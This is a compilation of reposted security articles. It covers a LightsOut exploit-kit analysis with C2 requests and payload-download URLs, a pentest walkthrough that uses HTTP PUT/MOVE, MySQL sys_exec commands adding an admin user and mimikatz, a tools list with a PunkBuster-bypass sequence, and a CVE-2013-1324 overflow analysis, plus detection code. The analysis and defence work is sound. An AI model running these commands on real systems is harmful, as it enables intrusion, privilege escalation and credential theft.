as the h2 page; the JNLP is encoded/presented differently. Uses deployJava.js from java.com; deployJava.runApplet( Loads the r2 JAR for downloading the dropper And it’s the exact same base64 encoded JNLP from H2. [h=4]h4 & h5 == Microsoft Internet Explorer 6 and Windows XP[/h] Heap Spray w/ DOM use-after-free vulnerability - we have ongoing research to determine exactly which CVE it is. [h=4]h6 == Microsoft Internet Explorer 8 and Windows XP[/h] CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability Snort SIDs: 26569 through 26572, 26603 and 26668 The code on the page is pretty much a direct rip-off of the metasploit ie_cgenericelement_uaf.rb module https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb [h=4]h7 == Java 6 update <= 32[/h] Direct <applet> loading of the r7 JAR, which leverages the CVE-2012-1723 classloader confusion vulnerability [h=3]Java JAR Analysis[/h] [h=4]r2 jar - CVE-2013-2465[/h] CVE-2013-2465 is the Incorrect image channel verification (buffered image) vulnerability, which permits execution of arbitrary code. The Java class grants itself full permissions via overloading java.security.AllPermission Ultimately downloads to disk and executes an executable (ntsys391.exe). This JAR has a pretty simple IDS evasion technique where it decodes the URL to download the executable at runtime, through a simple XOR routine. [h=4]r7 jar - CVE-2012-1723[/h] This exploits the getClassLoader vulnerability - by modifying a class file by hand, you can confuse the Java runtime between a static variable and an instance variable. This results in code being executed outside of the Java sandbox, when it hasn't been verified as safe. 
A Java class grants itself full permissions via overloading java.security.AllPermission One of the malicious classes in the JAR has another class embedded as a string that gets decoded and executed directly (r7-embedded.class, below) [h=4]r7-embedded.class[/h] This leverages java.security.PrivilegedExceptionAction When successful, it downloads an executable from a hardcoded url to the Java temp dir, and saves the file as ntsys391.exe. The hard-coded URL is the same .php file as the rest of the exploit kit including the fully qualified domain name. This may mean the exploit kit is rebuilt for each compromised host, or the r7 jar is dynamically built for each request by PHP. [h=3]Stage 4 - the dropped executable - which is a dropper as well[/h] Either one of the Java vulnerabilities or the heap spray in Microsoft Internet Explorer requests dtsrc.php?a=dwe, which is saved to disk as ntsys391.exe ntsys391.exe downloads additional executables, the .jpg URLs referenced below under “Network Indicators” [h=3]Host Indicators[/h] First stage dropper: - initially dropped as ntsys391.exe SHA: D667833E4915C385321B553785732BBED3009C2A SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da [*]Copies/Renames self as C:\Documents and Settings\Administrator\Application Data\ Broker services\WbemMonitor .exe [*]Runs self: "WbemMonitor .exe -fst” [*]Phones home to C2 w/ a POST request (see “Network Indicators” below) to retrieve other executables to download. 
[*]Retrieves shot.jpg, which is actually an EXE -> C:\Documents and Settings\Administrator\Application Data\ Broker services\plugs\mmc.exe SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e [h=3]Network Indicators[/h] Contacts 93.171.216.118 Request: (Analyst Note: notice — no User-Agent header, HTTP/1.1 to a dotted quad) POST /check_value.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 93.171.216.118 Content-Length: 42 Connection: Keep-Alive Cache-Control: no-cache [*]Post Body: identifiant=51032_2161380123730&version=2. Response: (Analyst Note: broken apart for readability - this was originally all on one line - lines delimited by a ; character, and trivially defanged) work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg; work:5|downexec hxxp://93.188.161[.]235/check2/muees27jxt/tl.jpg; work:7|downexec hxxp://93.188.161[.]235/check2/muees27jxt/fl.jpg; work:290|downexec hxxp://93.188.161[.]235/check2/muees27jxt/inf.jpg; 93.188.161.235 Request (Analyst Note: this kit only returns the JPG if the user-agent matches the string below, HTTP/1.1 to a dotted quad) GET /check2/muees27jxt/shot.jpg HTTP/1.1 User-Agent: User-Agent: Opera/10.35 Presto/2.2.30 Host: 93.188.161.235 Cache-Control: no-cache [*]Response: PE executable Written by Richard Harman at 1:24 PM Sursa: VRT: Continued analysis of the LightsOut Exploit Kit
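The "Network Indicators" section above calls out three traits of the dropper's traffic: a POST to a bare IPv4 Host with no User-Agent header, the check_value.php form body, and the doubled "User-Agent: User-Agent:" Opera string on the .jpg fetches. The following added example (not from the original analysis) turns those observations into detection logic run over sample requests; the sample requests are constructed from the headers quoted on the page, and the benign request is invented for contrast.

```python
"""Flag raw HTTP requests matching the LightsOut dropper traffic described above.

Added example, not part of the original analysis. Standard library only."""
import ipaddress
import re

# Values quoted in the analysis above.
C2_POST_PATH = "/check_value.php"
C2_BODY_RE = re.compile(r"identifiant=\d+_\d+&version=[\d.]+")
PAYLOAD_UA = "Opera/10.35 Presto/2.2.30"


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; a repeated name keeps its last value."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def _is_dotted_quad(host: str) -> bool:
    """True when the Host header is a literal IPv4 address (optionally with :port)."""
    host = host.split(":")[0]
    try:
        return isinstance(ipaddress.ip_address(host), ipaddress.IPv4Address)
    except ValueError:
        return False


def lightsout_indicators(raw: str) -> list:
    """Return the indicator names a request matches; an empty list means nothing seen."""
    method, path, headers, body = parse_request(raw)
    hits = []
    host = headers.get("host", "")
    # Trait 1: the C2 check-in is a POST straight to an IP with no User-Agent at all.
    if method == "POST" and _is_dotted_quad(host) and "user-agent" not in headers:
        hits.append("post-to-ip-without-user-agent")
    # Trait 2: the check-in path and form body shape.
    if path == C2_POST_PATH and C2_BODY_RE.match(body.strip()):
        hits.append("c2-checkin-body")
    # Trait 3: the payload fetch sends the header name twice, so the *value*
    # of User-Agent begins with "User-Agent:" and carries the fixed Opera string.
    ua = headers.get("user-agent", "")
    if ua.startswith("User-Agent:") and PAYLOAD_UA in ua:
        hits.append("doubled-user-agent-payload-fetch")
    return hits


# Constructed from the check-in request shown in the analysis.
SAMPLE_C2_POST = (
    "POST /check_value.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 93.171.216.118\r\n"
    "Content-Length: 42\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "identifiant=51032_2161380123730&version=2."
)

# Constructed from the payload fetch shown in the analysis.
SAMPLE_PAYLOAD_GET = (
    "GET /check2/muees27jxt/shot.jpg HTTP/1.1\r\n"
    "User-Agent: User-Agent: Opera/10.35 Presto/2.2.30\r\n"
    "Host: 93.188.161.235\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign request for contrast: POST to a hostname with a normal User-Agent.
SAMPLE_BENIGN = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Length: 9\r\n"
    "\r\n"
    "user=anna"
)

if __name__ == "__main__":
    for name, req in (("c2 post", SAMPLE_C2_POST), ("payload get", SAMPLE_PAYLOAD_GET),
                      ("benign", SAMPLE_BENIGN)):
        print(f"{name:12} -> {lightsout_indicators(req)}")
```

Trait 1 on its own is a weak signal (plenty of scripts talk to bare IPs without a User-Agent), so treat it as a triage hint and let the body shape or the doubled header confirm.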
-
[h=2]OpenSSH not anymore depending on OpenSSL[/h]
May 3rd, 2014 Mourad Ben Lakhoua

OpenSSH is an important set of programs that is used to encrypt communication and connect to servers over SSH. This is the standard way used by many system administrators to remotely manage thousands of servers. For a long time, developers have planned to remove the OpenSSL package, as it is not required for the communication and protocol functionality, but they use the crypto of OpenSSL. Now, starting with the next version of OpenSSH, it is possible to have the package compiled with the key make OPENSSL=no to remove the OpenSSL dependencies.

According to the release notes, with this setting administrators reduce a certain set of cryptographic standards from the old protocol SSH-1 (that include algorithms to curve25519, aes-ctr, chacha, ed25519). The protocol that should be used is SSH-2, which comes to add more security and is more reliable, while I think that the first version is not used anymore. With this new release it will be important to directly exclude OpenSSL and any other package that is not used, to reduce the vulnerability surface in your infrastructure.

OpenBSD and OpenSSH developers have recently launched a project called LibreSSL that comes to clean the OpenSSL code from glitches and security troubles, especially after the critical Heartbleed vulnerability which left 2/3 of websites in the cyberspace vulnerable for more than 2 years.

Sursa: OpenSSH not anymore depending on OpenSSL | SecTechno
-
The main purpose of this section is to provide program skeletons for research and beta or partial toolz. Rarely updated and not intended for real usage or for the common users...

aluigifuzz 0.3 (aluigifuzz)
this is the dumb file mutation fuzzer I wrote in 2011 for my personal usage and was incredibly useful at that time. I have decided to release it because I no longer use it, read aluigifuzz.txt for additional information and examples.

Offbreak (offbreak)
useful tool to track the operations performed by a program on a file at a given offset (hosted on ReVuln).

UDPSZ 0.3.4 (udpsz)
tool for sending UDP, TCP or any other type of packet with custom size, content, source port and IP address (spoofing, where possible). its options are very useful for more specific tests but not very easy to use (chaotic), that's why the -d option is suggested to check if the output packets really have the desired format. note that this tool has been written for myself so it acts mainly as a generic proof-of-concept for everything I want to test and prove.

One file only web/ftp server 0.6.1 (onlywebs)
multi-thread web and FTP server written to always provide the same file without the writing/listing/indexing features of such protocols, but now it's able to do many interesting things useful for my tests. it has various crazy options for testing purposes, so do NOT use it except if I specify it in my advisories. partially compatible with the following protocols: HTTP, FTP, WebDav, RTSP.

mygrep 0.1 (mygrep)
useful tool for scanning files and folders searching strings (C syntax supported) as binary patterns, utf16 unicode, base64, hex and other methods. example:
mygrep "\x08\x00\x00\x00mystring" file.txt folder\folder c:\path1

Generic FTP PASV ports consumption 0.1 (ftpports)
simple tool for sending endless PASV commands to FTP servers, it has been created as PoC for a bug in Serv-U FTP 11.1.0.3.

UDD files quick information 0.1 (uddinfo)
quick and basic tool which shows some information contained in the UDD files used in Ollydbg like the various breakpoints and the comments.

Webservers char tester 0.1.1 (webtestchr)
a simple tool which has been very useful in all this time for the blind and quick testing of some vulnerabilities in software that uses the HTTP protocol. practically it scans all the 255 ascii chars and puts them in some particular locations of the URI like before and after the slash or at the end of the URI and so on. usually the types of vulnerabilities which can be tested through this method are source disclosure (like for php and cgi files), security bypass (like folders or files which require specific rights or password), possible exceptions and others, all depending on the program to test. one of the recent advisories in which this tool was helpful was the source disclosure in Ruby WEBrick.

FindBits 0.2.2a (findbits)
simple and useful tool for analyzing a given file to search if there exist text strings or bytes which are packed in bitstreams. the tool can even be used to read and visualize a custom amount of bits, for example using the option -s "1 4 32 1000" the tool will visualize the hexadecimal, string, decimal and binary values of the first 1, 4 and 32 bits of the file and the hex dump of the subsequent 1000 bits. some examples of game protocols which use the bitstreams are the Unreal engine and the Battlefield series.

loDNS 0.1.1 (lodns)
simple tool I wrote for my tests which emulates a basic DNS server and logs all the hostnames in the received requests and then replies with a fixed IP address (A type). it uses 127.0.0.1 as default IP address to which the hostnames are resolved, but it can be changed at command-line; if the IP 0.0.0.0 is used the tool will not reply (monitoring only), while if you use 255.255.255.255 it will act like a proxy. it's a good way for resolving unknown hostnames locally while testing a program, it's only needed to set 127.0.0.1 as primary DNS and launch loDNS.

TFTP server tester 0.2a (tftpx)
nice tool that acts like a TFTP client with some advanced features.

Generic custom HTTP file uploader 0.2a (myhttpup)
simple tool for uploading files (POST + mime) choosing the name of the destination file, useful for testing directory traversal vulnerabilities in web servers and components which allow to upload files.

Unreal engine test server 0.1 (unrealts)
basic way for emulating an Unreal server and testing the sending of commands to a connected client.

Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp)
plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine:
sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234
(use -L "" for the runtime help)
then from the console of the game type:
connect 127.0.0.1:1234
the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes):
sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234
then from the client:
pb_cl_disable
connect 127.0.0.1:1234

Dumproc 0.1.1 (dumproc)
simple process dumper for both Windows and Linux.

Live for Speed demo/S1/S2 packets modifier example 0.1 (lfsanus)
useless and basic proxy tool for modifying the packets of this game, old stuff written just for fun.

Tcpdump format UDP 2 TCP converter 0.1.1 (pcapu2t)
simple tool written for converting the UDP packets of a PCAP file into a TCP stream, useful for tracking the packet flow with Wireshark. no longer needed because Wireshark implemented the following of UDP packets various versions ago.

WAVEhead 0.1 (wavehead)
experimental and useless tool for adding a wave header to raw files or for modifying existing wave headers (mainly for uncompressed files) or extracting the raw audio from wave files.

JavaScript slide show skeleton 0.1
a simple JavaScript example for animating many sequential image files.

Webpostmem 0.1 (webpostmem)
This tool can be used to check the POST attacks on webservers, as for example memory and sockets that are not freed if the client sends less data than how much is specified in Content-Length. It is the same proof-of-concept I have used for the bugs in Goahead webserver, NULLhttpd and WWW Fileshare Pro.

Q3huffdecenc 0.2 (q3huffdecenc)
compress and uncompress the files containing the "connect" packets of the games that use the Quake 3 engine.

Q3sendenc 0.2.1 (q3sendenc)
this tool gets a custom file specified by the user, compresses it using the Huffman compression, sends it to a server based on the Quake 3 engine and then waits for a reply. It also calculates the challenge, the protocol and the punkbuster parameters just to make a successful login with the server. it could be useful for who wants to test the Quake 3 engine and its possible flaws.

Custom GIF creator 0.1 (gifbug)
a very simple tool to create GIF files with customized headers.

HLspfed 0.1.1a (hlspfed)
Half-Life single-proxy forwarder with encoding/decoding functions. This tool is a packets forwarder (datapipe) for Half-Life that lets you modify, manipulate and insert any type of data you want in the packets exchanged between the Half-Life server and the client.

ut2003fits 0.1 (ut2003fits)
UT2003 fake information test server: this tool can be used to send custom information to the clients that search for multiplayer games (very funny if used when the real UT2003 server is running). this simple tool can be used in a lot of modes. For example you can launch UT2003heartbeat and then, launching UT2003fits, you will see all the players that are online, because every player that goes in the multiplayer section of UT2003 will automatically request information to all the servers available and you can log all these players (for example for statistical purposes).

Half-Life testing server 0.1.2 (hlts)
this server answers the Half-Life queries. It supports: ping, infostring, details, getchallenge, players, rules, challenge rcon and connect.

UT2003 heartbeat emulator 0.1 (ut2003heartbeat)
heartbeat protocol emulator for UT2003. With this little code you can add your IP address to the official Epic UT2003 servers list (epicgames.com and demo-all.txt). HERE there is the explanation of the protocol.

Quake 3 testing server 0.3 (q3ts)
this server answers the Quake 3 queries. It supports: getstatus, getinfo, getchallenge, connect (with real-time decompression), rcon and disconnect. It supports the infoResponse of Quake 3 arena 1.32, Soldier of Fortune 2 1.03 GOLD, Return to Castle Wolfenstein 1.41, Medal of Honor: Allied Assault 1.11.

Browser's headers viewer
simple unfiltered php script to see all the headers sent by your browser (useful to check the anonymity of a proxy for example)

Sursa: Luigi Auriemma
-
blueflower

blueflower is a simple tool that looks for secrets such as private keys or passwords in a file structure. Interesting files are detected using heuristics on their names and on their content. Unlike some forensics tools, blueflower does not search in RAM, and does not attempt to identify cryptographic keys or algorithms in binaries.

DISCLAIMER: This program is under development. It may not work as expected and it may destroy your computer. Use at your own risk.

Features
[*]multithreading
[*]detection of various key and password containers (SSH, Apple keychain, Java KeyStore, etc.) and other interesting files (Bitcoin wallets, PGP policies, etc.)
[*]detection of encrypted containers (Truecrypt, PGP Disks, GnuPG files, etc.)
[*]search in the content of the following types of files:
- text/* MIME-typed files
- archives RAR, tar, ZIP
- compressed files bzip2, gzip
- encrypted containers/archives: PGP/GPG, Truecrypt, RAR, ZIP
- PDF documents
[*]support of nested archives and compressed files (except for nested RARs)
[*]portable *nix/Windows
[*]CSV output

Sursa: https://github.com/veorq/blueflower
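To make the two heuristics concrete (names and content, plus recursion into nested archives), here is an added example; it is not blueflower's own code and its rule tables, path conventions and sample files are all constructed for the illustration. It classifies in-memory files by name pattern and by content signature, and descends into ZIP members, including a ZIP inside a ZIP, which is the nested-archive case the feature list mentions.

```python
import io
import re
import zipfile
from fnmatch import fnmatch

# Added example, not blueflower's own code: the two heuristics the description
# mentions (file names and file content) plus recursion into nested ZIPs.
# The rule tables and the sample tree are constructed for this example.

NAME_RULES = [
    ("ssh private key", ["id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"]),
    ("java keystore", ["*.jks", "*.keystore"]),
    ("apple keychain", ["*.keychain", "*.keychain-db"]),
    ("bitcoin wallet", ["wallet.dat"]),
    ("pgp/gpg material", ["*.gpg", "*.pgp", "secring.*", "pubring.*"]),
    ("pem/pkcs12 key material", ["*.pem", "*.key", "*.p12", "*.pfx"]),
]

CONTENT_RULES = [
    ("pem private key", re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("putty private key", re.compile(rb"^PuTTY-User-Key-File-\d", re.M)),
    ("password assignment", re.compile(rb"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*\S+")),
    ("aws access key id", re.compile(rb"\bAKIA[0-9A-Z]{16}\b")),
]


def classify(path, data):
    """Labels for one file: name heuristics first, then content heuristics."""
    base = path.rsplit("/", 1)[-1]
    labels = [label for label, pats in NAME_RULES if any(fnmatch(base, p) for p in pats)]
    labels += [label for label, rx in CONTENT_RULES if rx.search(data)]
    return labels


def scan_tree(files, prefix=""):
    """files maps path -> bytes. Returns [(path, labels)] for interesting files,
    descending into ZIP members (nested ZIPs included) with '!/' as separator."""
    findings = []
    for path, data in files.items():
        full = prefix + path
        labels = classify(full, data)
        if labels:
            findings.append((full, labels))
        if zipfile.is_zipfile(io.BytesIO(data)):
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = {m: zf.read(m) for m in zf.namelist() if not m.endswith("/")}
            findings += scan_tree(members, full + "!/")
    return findings


def build_sample_tree():
    """Constructed input: a key inside a ZIP inside a ZIP, a config with a
    password, an AWS credentials file (AWS's documented example key) and a note."""
    key = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
           b"b3BlbnNzaC1rZXktdjEAAAAA\n"
           b"-----END OPENSSH PRIVATE KEY-----\n")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("backup/id_rsa", key)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("inner.zip", inner.getvalue())
        zf.writestr("config.ini", b"[db]\nuser=app\npassword=s3cr3t\n")
    return {
        "home/notes.txt": b"nothing to see here\n",
        "home/.aws/credentials": b"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n",
        "home/archive.zip": outer.getvalue(),
    }


if __name__ == "__main__":
    for path, labels in scan_tree(build_sample_tree()):
        print(path, "->", ", ".join(labels))
```

Name rules are cheap and catch containers whose content is opaque (keystores, keychains, wallets); content rules catch keys that were copied to an arbitrary file name. Encrypted containers, which the tool also detects, would be another set of content signatures (magic bytes) in the same table.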
-
ICEcoder

ICEcoder is an open-source code editor, which provides a modern approach to building websites. By allowing you to code directly within the web browser, online or offline, it means you only need one program (your browser) to develop sites, plus you can test on actual web servers. After development, you can also maintain the website easily, all of which makes for speedy and smart development.

Because it can be web based you can use it from any internet enabled computer with a modern browser, and because it's open-source, customise it to your liking, integrating with online services. If you'd like to use it as a desktop code editor, no problem, you only need PHP 5.0+ (though 5.3+ is recommended), so you can use it on Linux and on PC via MAMP or XAMPP and Mac via WAMP (or another PHP installation).

ICEcoder was created because web devs (like myself) always complained their code editor didn't do exactly what they like. They're often bloated with features, slow and awkward. Conversely, ICEcoder is lightweight (zip is around 0.4mb) and boots in seconds (often 1-2s). Oh, and it's also free. Enjoy!

Code editor features

While it looks simplistic on the surface, ICEcoder packs a whole load of features and plugins to make coding slick & efficient. Some of the best include:

[*]use online or locally - Use it online from wherever you are, but it also runs under localhost too as a desktop solution.
[*]broken tag indicators - An indicator shows if you have broken tag structures and highlights where errors occurred.
[*]themes - 16 highlighting themes come as standard but you can easily make your own with a CSS file.
[*]find & replace builder - Find and replace can be applied to the current or all open documents, plus filenames & files.
[*]secure login - ICEcoder can be set up wherever you wish and is login secured to help keep your files safe. It's multi user too!
[*]type boosters - Plenty of coding assist is available such as Emmet, close tag completion and tag wrappers.
[*]nest display & selection - A nesting display shows your cursor position, hover over them to highlight, click to select.
[*]linting with JS Hint as you type - Your JavaScript code is linted with JS Hint as you type to ensure good coding practices.
[*]manage your MySQL databases - MySQL database management is easy with the Adminer plugin. It's like phpMyAdmin, but better.

Sursa: https://icecoder.net/
-
Owning The Enterprise With HTTP PUT

During a routine penetration testing engagement, we found an IIS webserver with HTTP methods (verbs) like PUT and DELETE enabled on it. During enumeration of the web server we figured it was configured to run PHP as well. The PUT method allows an attacker to place a file on the server. Uploading a web shell was our obvious choice. However, due to some security settings enabled on the server we were unable to upload any php/aspx/jsp etc. files. Had we been able to upload a shell, we would’ve gotten code execution on the server. But it was not as simple as we thought it to be.

After trying some variation of the file types, we figured out we could upload .txt files on the server. We could access these files by opening them through the browser. After multiple attempts we decided to use something very simple: the “MOVE” method to rename the files once they were uploaded on the server. So we uploaded a .php file as .txt and renamed that to .php. The screenshot for these two steps is shown below:

Here is the output when visiting our test123.php file:

Safemode was enabled on the server and we didn’t really try to bypass that. But we uploaded an ASPX Shell on the server (rename the .txt file to .aspx as mentioned earlier). At this point our service was running with “Network Service” privileges and we were limited in terms of our control on the server. Using our ASPX webshell we were at least able to traverse the content on the server. We were able to read the MySQL configuration details for one of the applications configured on the server and noted that the database is configured using root.

Armed with the credentials of the MySQL root user, we could login to the server remotely. Unlike Microsoft SQL Server there is no built-in stored procedure like xp_cmdshell that allows us to execute OS commands. However, MySQL has User Defined Functions (UDF) that can be used to execute OS level commands but they are not available by default.

At this point “lib_mysqludf_sys” available on https://github.com/mysqludf comes in handy. The “lib_mysqludf_sys” library has functions to interact with the operating system. These functions allow you to interact with the execution environment in which MySQL runs. This library is available with SQLMAP (udf/mysql).

Firstly, we copied the library on to the target machine in a known location using the PUT method. We had to write this file to the “c:\windows\system32” directory. But our web server was running with limited privileges. While logging in we faced another issue: the root user is not allowed to login remotely on the MySQL database. This was easy to overcome! We wrote a php file which allowed our IP address to login remotely on the MySQL server and executed it using the same steps that we have been doing so far.

Next, we logged in and triggered a SQL query to load this file into a newly created table row. Here, we are instructing MySQL to create a new function to point to the code in our malicious library. Finally, we executed this new function with arbitrary system commands that we wish to run. The commands used are shown below:

USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://root//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user omair NIIConsult!n4 /add");
SELECT sys_exec("net localgroup Administrators omair /add");

As seen, a user omair with administrative privileges was added to the server. Further, we logged in to the server through remote desktop.

Time to escalate our privileges even further! At this stage, we were local administrator and did not have a domain account. We found multiple users logged in to the system. At this point we want to dump the passwords from the memory of that system. Mimikatz helps you do that.

What is Mimikatz?

Mimikatz is a slick tool that pulls plain-text passwords out of WDigest interfaced through LSASS. Read here to know more about how to use different features in Mimikatz.

We then uploaded “mimikatz.exe” on the server using our account omair. It was likely that the antivirus on the server would flag it. In our case it did not. Even if it did we could use various evasion techniques to upload and execute the file. We then used our favourite WDigest method to retrieve passwords in clear text and get credentials for a user “taufiq” who was an ordinary Domain User but also had Admin privileges on some product related servers.

Now we logged into all these product related servers with the account we had to search for more interesting accounts which we could escalate our privileges to. We were able to find several accounts but the most authoritative account was of course the Domain Admin. That’s it, we again uploaded mimikatz on this system and obtained the password for the Domain Admin account. Net result was that the Domain was 0wned! From here on we could use the smbexec utility to extract domain hashes from the domain controller.

Conclusion: This article shows how a simple vulnerability like enabling HTTP verbs such as PUT and MOVE can serve as the doorway to a far more insidious attack and allow the attacker to take complete ownership of the network. Of course, there were a large number of other vulnerabilities that allowed us to do this – but the entry point was simply one mis-configured HTTP server!

Author: Omair

Sursa: Owning The Enterprise With HTTP PUT - Checkmate
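The entry point of this whole chain, an IIS server accepting PUT and MOVE, leaves a very recognisable trace in the web server's own logs. The following is an added example, not code from the Checkmate write-up: it parses IIS W3C-format log lines (the field list is read from the "#Fields:" header, so the parser adapts to whatever columns are enabled) and flags accepted write verbs, the PUT-then-MOVE rename of the same resource from one client that the article relies on, and a script file fetched by a client that previously had a write verb accepted. The log lines are constructed for the example.

```python
# Added example, not from the Checkmate write-up: detection logic for the entry
# point described above, run over constructed IIS W3C-format log lines.
# Field names follow IIS's W3C Extended Log conventions; the sample is made up.

WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXTENSIONS = (".php", ".aspx", ".asp", ".jsp")


def parse_w3c(text):
    """Parse '#Fields:'-described W3C log text into a list of dicts."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def successful_write_methods(rows):
    """Rows where a write-capable verb was accepted (status < 400)."""
    return [r for r in rows
            if r["cs-method"] in WRITE_METHODS and int(r["sc-status"]) < 400]


def upload_then_rename(rows):
    """Pair an accepted PUT with a later accepted MOVE/COPY of the same resource
    from the same client: the .txt -> .php trick the write-up relies on."""
    last_put, pairs = {}, []
    for r in rows:
        if int(r["sc-status"]) >= 400:
            continue
        key = (r["c-ip"], r["cs-uri-stem"])
        if r["cs-method"] == "PUT":
            last_put[key] = r
        elif r["cs-method"] in ("MOVE", "COPY") and key in last_put:
            pairs.append((last_put.pop(key), r))
    return pairs


def script_fetch_after_write(rows):
    """GETs of script files by a client that earlier had a write verb accepted."""
    writers, hits = set(), []
    for r in rows:
        if r["cs-method"] in WRITE_METHODS and int(r["sc-status"]) < 400:
            writers.add(r["c-ip"])
        elif (r["cs-method"] == "GET" and r["c-ip"] in writers
              and r["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS)):
            hits.append(r)
    return hits


# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2014-05-03 10:00:01 198.51.100.7 GET /index.php 200
2014-05-03 10:00:05 198.51.100.7 OPTIONS / 200
2014-05-03 10:00:09 198.51.100.7 PUT /test123.txt 201
2014-05-03 10:00:12 198.51.100.7 MOVE /test123.txt 201
2014-05-03 10:00:15 198.51.100.7 GET /test123.php 200
2014-05-03 10:00:20 203.0.113.9 PUT /upload.txt 403
"""

if __name__ == "__main__":
    rows = parse_w3c(SAMPLE_IIS_LOG)
    for r in successful_write_methods(rows):
        print("write verb accepted:", r["c-ip"], r["cs-method"], r["cs-uri-stem"])
    for put, mv in upload_then_rename(rows):
        print("upload-then-rename:", put["c-ip"], put["cs-uri-stem"], "->", mv["cs-method"])
    for r in script_fetch_after_write(rows):
        print("script fetched after write:", r["c-ip"], r["cs-uri-stem"])
```

On the prevention side the fix is configuration rather than detection: remove the WebDAV module where it is not needed, and deny the write verbs for the site with IIS Request Filtering (the verbs section under requestFiltering in web.config), so that a PUT or MOVE is rejected before any handler sees it.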
-
CVE-2013-1324 Microsoft Office WPD File Remote Memory Corruption Vulnerability

Author: Ling Chuan Lee
Vulnerable: Microsoft Office Word 2007 (12.0.4518.1014) MSO (12.0.4518.1014)
Tested Platform: Windows 7 Professional

The WordPerfect 5 converter module used by Microsoft Office Word was vulnerable to a stack buffer overflow when processing a specially crafted WordPerfect document with an invalid number of CSTYL border elements. In order to understand what is going on, we need to understand the file format used by WordPerfect. You could get a copy of the WordPerfect file format from here: WP6 File Format SDK

In WP5.x documents, the file header is 16 bytes long. Next is the file prefix in blocks of five indexes with their relative data following each index block. F13 Research Labs identified the vulnerable WP records in variable-length multi-byte function 0xDC. The codes for variable length multi byte functions [208 (0xD0) through 239 (0xEF)] appear twice each time the function is invoked. The first occurrence is the 'open gate' and the second is the 'closing gate'. Each 'open gate' is followed by a subgroup byte, a value of size short (16 bits) and a function flags byte. If the flags indicate there is prefix data associated with the function, a number of prefix ID bytes come next, followed by the prefix index-ID words. Next is a word (16 bits) showing the size of the non-deletable information. Following the deletable data are a size word and the 'closing gate' [1]. Here is a picture representation of the generic WordPerfect 5.x File Structure:

Figure 1: WordPerfect 5.x File Structure

The CVE-2013-1324 vulnerability is a classic stack buffer overflow that occurs when the WordPerfect 5 converter module 'WPFT532.CNV' processes a crafted WordPerfect file with the unusual values '0x00' and '0xAC'.

Figure 2: Malformed Multi-byte Function 0xDC
Figure 3: Malformed Multi-byte Function 0xDC

When we looked into the execution flow, we noticed that the code at address '0x014D9315' (and eax, 7FFFh) is the instruction that caused the value of the total number of the loop (eax), which is writing bytes into a stack, to become '0x2C00'.

Figure 4: The Invalid Value 0x2C00

.text:014D931A mov [ebp+var_4], eax ;[ebp-4]=0000 2c00
.text:014D931D xor eax, eax ;eax=0
.text:014D931F mov ah, [esi+1] ;ah=00
.text:014D9322 mov al, [esi] ;al=00
......
......
.text:014D9315 and eax, 7FFFh ;eax=0000 ac00&7FFFh=0000 2c00

As you can see from the figure below, 'loc_14D9336' is a loop calling the function 'sub_14D89A4' which is writing bytes into a stack-defined variable with a fixed size. For each loop, the total number of the loop ([ebp+var_4]) will increase by '0xFFFF' until it is equal to zero, and edi represents the current index from the process. This code is inside a loop and as the loop goes on, the index value will increase. Since no bounds check happens, the Stack Base Pointer Register (EBP) will be overwritten in function 'sub_14D89A4' after the index of the loop (edi) hits 0x20, which leads to a stack buffer overflow.

Figure 4: Writing Bytes into a Stack-defined Variable with a Fixed Size

Figure 5 shows the code where the overwrite of the Stack Base Pointer Register (EBP) happens. As shown below, the value of '0x6a0' is the total size to write. If the user has a larger value, this WordPerfect document file may trigger the stack buffer overflow by overwriting the buffer with a bigger number.

